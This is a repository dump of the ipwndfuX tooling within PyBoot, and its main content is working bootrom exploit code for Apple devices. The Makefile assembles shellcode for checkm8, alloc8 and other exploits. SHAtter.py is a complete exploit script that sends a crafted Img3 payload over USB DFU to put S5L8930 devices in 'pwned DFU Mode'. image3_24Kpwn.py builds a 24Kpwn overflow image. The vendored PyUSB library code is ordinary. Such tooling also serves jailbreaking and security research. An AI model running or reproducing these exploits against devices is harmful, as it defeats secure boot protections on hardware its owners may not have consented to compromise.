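	arm-none-eabi-as -mthumb --fatal-warnings -o bin/alloc8-shellcode.o src/alloc8-shellcode.S
	arm-none-eabi-objcopy -O binary bin/alloc8-shellcode.o bin/alloc8-shellcode.bin
	rm bin/alloc8-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/ibss-flash-nor-shellcode.o src/ibss-flash-nor-shellcode.S
	arm-none-eabi-objcopy -O binary bin/ibss-flash-nor-shellcode.o bin/ibss-flash-nor-shellcode.bin
	rm bin/ibss-flash-nor-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/usb_0xA1_2_armv7.o src/usb_0xA1_2_armv7.S
	arm-none-eabi-objcopy -O binary bin/usb_0xA1_2_armv7.o bin/usb_0xA1_2_armv7.bin
	rm bin/usb_0xA1_2_armv7.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/checkm8_armv7.o src/checkm8_armv7.S
	arm-none-eabi-objcopy -O binary bin/checkm8_armv7.o bin/checkm8_armv7.bin
	rm bin/checkm8_armv7.o

arm64:
	xcrun -sdk iphoneos clang src/usb_0xA1_2_arm64.S -target arm64-apple-darwin -Wall -o bin/usb_0xA1_2_arm64.o
	gobjcopy -O binary -j .text bin/usb_0xA1_2_arm64.o bin/usb_0xA1_2_arm64.bin
	rm bin/usb_0xA1_2_arm64.o

	xcrun -sdk iphoneos clang src/checkm8_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_arm64.o
	gobjcopy -O binary -j .text bin/checkm8_arm64.o bin/checkm8_arm64.bin
	rm bin/checkm8_arm64.o

	xcrun -sdk iphoneos clang src/t8010_t8011_disable_wxn_arm64.S -target arm64-apple-darwin -Wall -o bin/t8010_t8011_disable_wxn_arm64.o
	gobjcopy -O binary -j .text bin/t8010_t8011_disable_wxn_arm64.o bin/t8010_t8011_disable_wxn_arm64.bin
	rm bin/t8010_t8011_disable_wxn_arm64.o

	xcrun -sdk iphoneos clang src/t8015_shellcode_arm64.S -target arm64-apple-darwin -Wall -o bin/t8015_shellcode_arm64.o
	gobjcopy -O binary -j .text bin/t8015_shellcode_arm64.o bin/t8015_shellcode_arm64.bin
	rm bin/t8015_shellcode_arm64.o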
53 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/SHAtter.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on SHAtter exploit (segment overflow) by posixninja and pod2g.
2 |
3 | import struct, sys, time
4 | import dfu
5 |
def generate_payload():
    """Build the byte string that exploit() hands to dfu.send_data().

    The result is an Img3-style header, a tag area and the contents of
    bin/SHAtter-shellcode.bin, concatenated in that order.

    NOTE(review): Python 2 only as written -- text literals are passed to
    struct's 's' format, which requires bytes on Python 3.
    """
    shellcode_address = 0x8402F198 + 1
    data = struct.pack('<40sI', '\xF0' * 40, shellcode_address)
    tags = data + struct.pack('<4s2I4s2I', 'SHSH'[::-1], 12, 0, 'CERT'[::-1], 12, 0)
    header = struct.pack('<4s3I4s', 'Img3'[::-1], 20 + len(tags), len(tags), len(data), 'ibss'[::-1])
    # Relative path: resolved against the current working directory, not
    # against the location of this file.
    with open('bin/SHAtter-shellcode.bin', 'rb') as f:
        shellcode = f.read()
    # Size limit on the blob read from disk; as an assert it is not checked
    # when Python runs with -O.
    assert len(shellcode) <= 1024
    return header + tags + shellcode
15 |
def exploit():
    """Run the SHAtter sequence against the device returned by dfu.acquire_device().

    Returns None. Returns early without touching the device when its serial
    number string already contains 'PWND:['. Exits with status 1 when the
    string lacks 'CPID:8930' or 'SRTG:[iBoot-574.4]', or when
    'PWND:[SHAtter]' is not present once the sequence has finished.

    NOTE(review): the order of the dfu calls below is kept exactly as the
    original authors wrote it.
    """
    print '*** based on SHAtter exploit (segment overflow) by posixninja and pod2g ***'

    device = dfu.acquire_device()
    print 'Found:', device.serial_number

    # The device's serial number string doubles as a state report; every
    # compatibility check below is a substring test on it.
    if 'PWND:[' in device.serial_number:
        print 'Device is already in pwned DFU Mode. Not executing exploit.'
        return

    if 'CPID:8930' not in device.serial_number:
        print 'ERROR: Not a compatible device. This exploit is for S5L8930 devices only. Exiting.'
        sys.exit(1)

    if 'SRTG:[iBoot-574.4]' not in device.serial_number:
        print 'ERROR: CPID is compatible, but serial number string does not match.'
        print 'Make sure device is in SecureROM DFU Mode and not LLB/iBSS DFU Mode. Exiting.'
        sys.exit(1)

    # From here on the device handle is released and re-acquired between
    # steps.
    dfu.reset_counters(device)
    dfu.get_data(device, 0x40)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.request_image_validation(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.get_data(device, 0x2C000)
    dfu.release_device(device)

    time.sleep(0.5)

    device = dfu.acquire_device()
    dfu.reset_counters(device)
    dfu.get_data(device, 0x140)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.request_image_validation(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.send_data(device, generate_payload())
    dfu.get_data(device, 0x2C000)
    dfu.release_device(device)

    time.sleep(0.5)

    # Success is judged only by the serial number string the device reports
    # after it has been re-acquired.
    device = dfu.acquire_device()
    failed = 'PWND:[SHAtter]' not in device.serial_number
    dfu.release_device(device)

    if failed:
        print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
        sys.exit(1)

    print 'Device is now in pwned DFU Mode.'
76 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/aes-keys/S5L8920-firmware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/aes-keys/S5L8920-firmware
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/0x8015.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/0x8015.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/steaks4uce-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/t8015_shellcode_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/t8015_shellcode_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuX/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuX/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
6 | MAX_PACKET_SIZE = 0x800
7 |
def acquire_device(timeout=5.0, match=None, fatal=True):
    """Find a USB device with vendor id 0x5AC and product id 0x1227.

    Args:
        timeout: seconds to keep polling; at least one scan is always made.
        match: if not None, only a device whose serial_number contains this
            substring is accepted.
        fatal: when true, print an error and exit with status 1 if nothing
            was found; when false, return None instead.

    Returns:
        The first matching device, or None (only when *fatal* is false).
    """
    backend = usb.backend.libusb1.get_backend(
        find_library=lambda _candidate: libusbfinder.libusb1_path())
    began = time.time()
    while True:
        candidates = usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend)
        for device in candidates:
            if match is None or match in device.serial_number:
                return device
        time.sleep(0.001)
        # Stop polling once the timeout has elapsed.
        if time.time() - began >= timeout:
            break
    if fatal:
        print('ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout)
        sys.exit(1)
    return None
25 |
def release_device(device):
    """Release the resources held for *device* via usb.util.dispose_resources()."""
    usb.util.dispose_resources(device)
29 |
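def reset_counters(device):
    """Send the control request (bmRequestType 0x21, bRequest 4) with no data.

    Raises:
        AssertionError: if ctrl_transfer() reports anything other than 0
            bytes transferred.
    """
    # The transfer is kept out of an assert statement on purpose: python -O
    # strips asserts, which would silently drop the request itself.
    transferred = device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000)
    if transferred != 0:
        raise AssertionError('reset_counters: ctrl_transfer returned %r, expected 0' % (transferred,))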
33 |
def usb_reset(device):
    """Call device.reset(), ignoring a usb.core.USBError raised by it."""
    try:
        device.reset()
    except usb.core.USBError:
        # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
        return
42 |
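def send_data(device, data):
    """Send *data* to the device in chunks of at most MAX_PACKET_SIZE bytes.

    Each chunk goes out as one control transfer (bmRequestType 0x21,
    bRequest 1) with a 5000 ms timeout. Empty *data* sends nothing.

    Raises:
        AssertionError: if a transfer reports a byte count different from
            the chunk length.
    """
    for index in range(0, len(data), MAX_PACKET_SIZE):
        chunk = data[index:index + MAX_PACKET_SIZE]
        # Kept out of an assert statement: python -O strips asserts, which
        # would silently skip the transfer itself.
        sent = device.ctrl_transfer(0x21, 1, 0, 0, chunk, 5000)
        if sent != len(chunk):
            raise AssertionError('send_data: ctrl_transfer sent %r of %d bytes' % (sent, len(chunk)))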
50 |
def get_data(device, amount):
    """Read *amount* bytes from the device and return them as one string.

    The read is split into control transfers (bmRequestType 0xA1,
    bRequest 2) of at most MAX_PACKET_SIZE bytes, each with a 5000 ms
    timeout. Returns an empty string when *amount* is not positive.
    """
    chunks = []
    remaining = amount
    while remaining > 0:
        part = min(remaining, MAX_PACKET_SIZE)
        ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
        # A short read is treated as a programming error.
        assert len(ret) == part
        chunks.append(ret.tostring())
        remaining -= part
    return str().join(chunks)
61 |
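def request_image_validation(device):
    """Send an empty transfer, issue three status requests, then reset the port.

    The empty transfer uses bmRequestType 0x21, bRequest 1; the three
    follow-up requests use bmRequestType 0xA1, bRequest 3 and ask for 6
    bytes each. Their results are not inspected.

    Raises:
        AssertionError: if the empty transfer reports anything other than 0
            bytes transferred.
    """
    # Kept out of an assert statement: python -O strips asserts, which would
    # silently skip this transfer.
    sent = device.ctrl_transfer(0x21, 1, 0, 0, '', 1000)
    if sent != 0:
        raise AssertionError('request_image_validation: ctrl_transfer returned %r, expected 0' % (sent,))
    for _ in range(3):
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
    usb_reset(device)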
69 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/image3_24Kpwn.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on 24Kpwn exploit (segment overflow) by chronic, CPICH, ius, MuscleNerd, Planetbeing, pod2g, posixninja, et al.
2 |
3 | import struct
4 | import image3
5 |
6 | def exploit(img3, securerom):
7 | with open('bin/24Kpwn-shellcode.bin', 'rb') as f:
8 | shellcode = f.read()
9 | MAX_SHELLCODE_LENGTH = 1024
10 | assert len(shellcode) <= MAX_SHELLCODE_LENGTH
11 |
12 | # Check IMG3 constraints.
13 | (img3_magic, total_size, data_size, signed_size, magic) = struct.unpack('<4s3I4s', img3[:20])
14 | assert img3_magic == 'Img3'[::-1] and signed_size != 0 and magic == 'illb'[::-1]
15 | assert total_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12
16 | assert data_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
17 | assert signed_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
18 | assert 20 + signed_size + 4 <= len(img3) and img3[20 + signed_size:20 + signed_size + 4] == 'SHSH'[::-1]
19 |
20 | PADDING = 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - (20 + signed_size + 12)
21 | SHELLCODE_ADDRESS = 0x84000000 + 1 + (20 + signed_size + 12 + PADDING)
22 | STACK_ADDRESS = 0x84033EA4
23 | img3 = struct.pack('<4s3I4s', 'Img3'[::-1], 0x24200, 0x241BC, 0x23F88, 'illb'[::-1]) + img3[20:20 + signed_size] \
24 | + struct.pack('4s2I%sx' % PADDING, '24KP'[::-1], 12 + PADDING + len(shellcode) + 4, PADDING + len(shellcode) + 4) + shellcode \
25 | + struct.pack(' 0x24000
32 | assert img3[16:20] == 'illb'[::-1]
33 |
34 | obj = image3.Image3(img3)
35 | if obj.getDecryptedPayload()[:4] != '\x0e\x00\x00\xea':
36 | # This is a 24Kpwn implementation which changes DATA tag. First dword of DATA tag should look like a shellcode address.
37 | shellcode_address, = struct.unpack('= 2.4, ctypes and at least one of the
23 | builtin backends.
24 |
25 | PyUSB supports libusb 0.1, libusb 1.0 and OpenUSB, but the user does not need
26 | to worry about that, unless in some corner cases.
27 |
28 | If you have any question about PyUSB, you can use the PyUSB mailing list
29 | hosted in the SourceForge. In the PyUSB website (http://walac.github.io/pyusb)
30 | you can find instructions on how to subscribe to the mailing list.
31 |
32 | Installing PyUSB on GNU/Linux Systems
33 | =====================================
34 |
35 | These instructions are for Debian-based systems. Instructions for
36 | other flavors of GNU/Linux should be similar.
37 |
38 | You will first need to install the following packages:
39 |
40 | 1) python (PyUSB is useless without it), version >= 2.4
41 | 2) At least one of the supported libraries (libusb 1.0, libusb 0.1 or OpenUSB)
42 | 3) If your Python version is < 2.5, you have to install ctypes as a separate
43 | package, because these versions of Python do not ship it.
44 |
45 | For example, the command::
46 |
47 | $ sudo apt-get install python libusb-1.0-0
48 |
49 | should install all these packages on most Debian-based systems with
50 | access to the proper package repositories.
51 |
52 | Once the above packages are installed, you can install PyUSB
53 | with the command::
54 |
55 | $ sudo python setup.py install
56 |
57 | Run it as root from within the same directory as this README file.
58 |
59 | You can also use `pip `_ to
60 | install PyUSB::
61 |
62 | $ sudo pip install pyusb --pre
63 |
64 | Just bear in mind that you still have to follow the procedure to install the
65 | libusb library.
66 |
67 | For pure Debian variants
68 | ------------------------
69 |
70 | For pure Debian systems you are advised to install either the
71 | python-usb or python3-usb packages. These are prebuilt based on
72 | PyUSB and libusb-1.0::
73 |
74 | $ sudo apt-get install python-usb python3-usb
75 |
76 | You may wish to get the backported version 1.0, since PyUSB
77 | doesn't depend upon any truly unstable packages.
78 |
79 | Installing PyUSB on Windows
80 | ===========================
81 |
82 | Now that PyUSB is 100% written in Python, you install it on Windows
83 | in the same way you do on Linux::
84 |
85 | python setup.py install
86 |
87 | If you get some kind of "command not found" error, make sure to add
88 | the Python install directory to your PATH environment variable or
89 | give the complete path to the Python interpreter.
90 |
91 | Remember that you need libusb (1.0 or 0.1) or OpenUSB running on your
92 | system. For Windows users, libusb 0.1 is provided through
93 | `libusb-win32 `_
94 | package. Check the libusb website for updates
95 | (http://www.libusb.info).
96 |
97 | Reporting bugs/Submitting patches
98 | =================================
99 |
100 | Some people have been sending patches and reporting bugs directly
101 | to my email. Please do it through
102 | `github `_ instead; I had a hard time tracking
103 | their names to put them in the acknowledgments file. ;-)
104 |
105 | PS: this README file was based on the great Josh Lifton's one... ^_^
106 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""PyUSB - Easy USB access in Python
30 |
31 | This package exports the following modules and subpackages:
32 |
33 | core - the main USB implementation
34 | legacy - the compatibility layer with 0.x version
35 | backend - the support for backend implementations.
36 | control - USB standard control requests.
37 | libloader - helper module for backend library loading.
38 |
39 | Since version 1.0, main PyUSB implementation lives in the 'usb.core'
40 | module. New applications are encouraged to use it.
41 | """
42 |
43 | import logging
44 | import os
45 |
46 | __author__ = 'Wander Lairson Costa'
47 |
48 | # Use Semantic Versioning, http://semver.org/
49 | version_info = (1, 0, 0)
50 | __version__ = '%d.%d.%d' % version_info
51 |
52 | __all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
53 |
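def _setup_log():
    """Configure the 'usb' logger from the process environment.

    When PYUSB_DEBUG is set, call tracing is switched on, the logger level is
    taken from its value ('debug', 'info', 'warning', 'error' or 'critical';
    anything else maps to a level above CRITICAL) and a handler is attached:
    a file handler for PYUSB_LOG_FILENAME, or a stream handler when that
    file cannot be opened or the variable is unset.

    When PYUSB_DEBUG is not set, a do-nothing handler is attached and the
    level is raised above CRITICAL.

    NOTE(review): PYUSB_LOG_FILENAME is opened exactly as given in the
    environment, and traced calls are logged with their arguments. When this
    code runs with elevated privileges, scrub both variables from the
    environment unless tracing is intended.
    """
    from usb import _debug
    logger = logging.getLogger('usb')
    debug_level = os.getenv('PYUSB_DEBUG')

    if debug_level is not None:
        _debug.enable_tracing(True)
        filename = os.getenv('PYUSB_LOG_FILENAME')

        LEVELS = {'debug': logging.DEBUG,
                  'info': logging.INFO,
                  'warning': logging.WARNING,
                  'error': logging.ERROR,
                  'critical': logging.CRITICAL}

        level = LEVELS.get(debug_level, logging.CRITICAL + 10)
        logger.setLevel(level = level)

        try:
            handler = logging.FileHandler(filename)
        except Exception:
            # Unset, unusable or unwritable log file: log to the stream
            # instead. Exception rather than a bare except, so that
            # KeyboardInterrupt and SystemExit are not swallowed here.
            handler = logging.StreamHandler()

        fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
        handler.setFormatter(fmt)
        logger.addHandler(handler)
    else:
        class NullHandler(logging.Handler):
            def emit(self, record):
                pass

        # We set the log level to avoid delegation to the
        # parent log handler (if there is one).
        # Thanks to Chris Clark to pointing this out.
        logger.setLevel(logging.CRITICAL + 10)

        logger.addHandler(NullHandler())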
91 |
92 |
93 | _setup_log()
94 |
95 | # We import all 'legacy' module symbols to provide compatibility
96 | # with applications that use 0.x versions.
97 | from usb.legacy import *
98 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/_debug.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | __author__ = 'Wander Lairson Costa'
30 |
31 | __all__ = ['methodtrace', 'functiontrace']
32 |
33 | import logging
34 | import usb._interop as _interop
35 |
36 | _enable_tracing = False
37 |
def enable_tracing(enable):
    """Set the module-wide tracing flag to *enable*.

    methodtrace() and functiontrace() read the flag at the moment they
    decorate a function, so functions decorated while it was false stay
    untraced even if it is switched on later.
    """
    global _enable_tracing
    _enable_tracing = enable
41 |
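def _trace_function_call(logger, fname, *args, **named_args):
    """Log one call as ``fname(arg, ..., name=value, ...)`` at DEBUG level.

    Args:
        logger: object with a ``debug(message)`` method.
        fname: name to show for the called function.
        *args: positional arguments of the traced call.
        **named_args: keyword arguments of the traced call.

    NOTE(review): every argument is rendered with str() and written to the
    log in full, so buffers handed to traced calls (payloads, key material)
    end up in the log output. Protect the log file accordingly.
    """
    # TODO: check if 'f' is a method or a free function
    # Positional and keyword arguments go into one list so that a single
    # join puts ', ' between all of them, including at the boundary between
    # the two groups.
    rendered = [str(val) for val in args]
    rendered.extend(name + '=' + str(val) for name, val in named_args.items())
    logger.debug(fname + '(' + ', '.join(rendered) + ')')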
49 |
def methodtrace(logger):
    """Build a decorator that traces method calls on *logger*.

    While the module-level tracing switch is off at decoration time, the
    method is returned untouched. Otherwise each call is logged as
    ``ClassName.method(args...)``, where the class name is taken from the
    first positional argument, and the call is then forwarded unchanged.
    """
    def decorator_logging(f):
        if _enable_tracing:
            def do_trace(*args, **named_args):
                # Skip the string building entirely unless DEBUG records
                # would actually be emitted.
                if logger.getEffectiveLevel() <= logging.DEBUG:
                    qualified = type(args[0]).__name__ + '.' + f.__name__
                    _trace_function_call(logger, qualified, *args[1:], **named_args)
                return f(*args, **named_args)
            _interop._update_wrapper(do_trace, f)
            return do_trace
        return f
    return decorator_logging
64 |
def functiontrace(logger):
    """Build a decorator that traces free-function calls on *logger*.

    While the module-level tracing switch is off at decoration time, the
    function is returned untouched. Otherwise each call is logged under the
    function's own name with all of its arguments, and then forwarded
    unchanged.
    """
    def decorator_logging(f):
        if _enable_tracing:
            def do_trace(*args, **named_args):
                # Skip the string building entirely unless DEBUG records
                # would actually be emitted.
                if logger.getEffectiveLevel() <= logging.DEBUG:
                    _trace_function_call(logger, f.__name__, *args, **named_args)
                return f(*args, **named_args)
            _interop._update_wrapper(do_trace, f)
            return do_trace
        return f
    return decorator_logging
78 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
37 | __all__ = ['_reduce', '_set', '_next', '_update_wrapper']
38 |
# Python 2.4 is the oldest interpreter this package supports.
# NOTE(review): an assert is skipped when Python runs with -O, so this guard
# only fires in non-optimised runs.
assert sys.hexversion >= 0x020400f0

# reduce() is a functools function on Python 3; where functools or its
# reduce attribute is missing, fall back to the builtin.
try:
    from functools import reduce as _reduce
except (ImportError, AttributeError):
    _reduce = reduce

# all() became a builtin in Python 2.5; emulate it with reduce before that.
try:
    _all = all
except NameError:
    def _all(iter_):
        return _reduce(lambda x, y: x and y, iter_, True)

# The builtin set type exists since Python 2.5; older versions ship sets.Set.
try:
    _set = set
except NameError:
    from sets import Set as _set
61 |
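# On Python >= 2.6, we have the builtin next() function
# On Python 2.5 and before, we have to call the iterator method next()
def _next(iter):
    """Return the next item of *iter* on every supported Python version.

    The builtin lookup is kept separate from the call itself: a NameError
    raised from inside the iterator is then passed on to the caller instead
    of being mistaken for "next() does not exist" and retried through
    iter.next().
    """
    try:
        advance = next
    except NameError:
        advance = None

    if advance is None:
        return iter.next()
    return advance(iter)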
69 |
# functools, and update_wrapper with it, first shipped in Python 2.5.
try:
    import functools
    _update_wrapper = functools.update_wrapper
except (ImportError, AttributeError):
    def _update_wrapper(wrapper, wrapped):
        """Copy the identifying attributes of *wrapped* onto *wrapper*.

        Unlike functools.update_wrapper, this fallback makes the wrapper
        share the wrapped function's __dict__ object and returns None.
        """
        for attr in ('__name__', '__module__', '__doc__', '__dict__'):
            setattr(wrapper, attr, getattr(wrapped, attr))
80 |
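# this is used (as of May 2015) twice in core, once in backend/openusb, and in
# some unit test code. It would probably be clearer if written in terms of some
# definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
def as_array(data=None):
    """Return *data* as an ``array.array`` of unsigned bytes (typecode 'B').

    None yields an empty array, and an existing array is returned as-is
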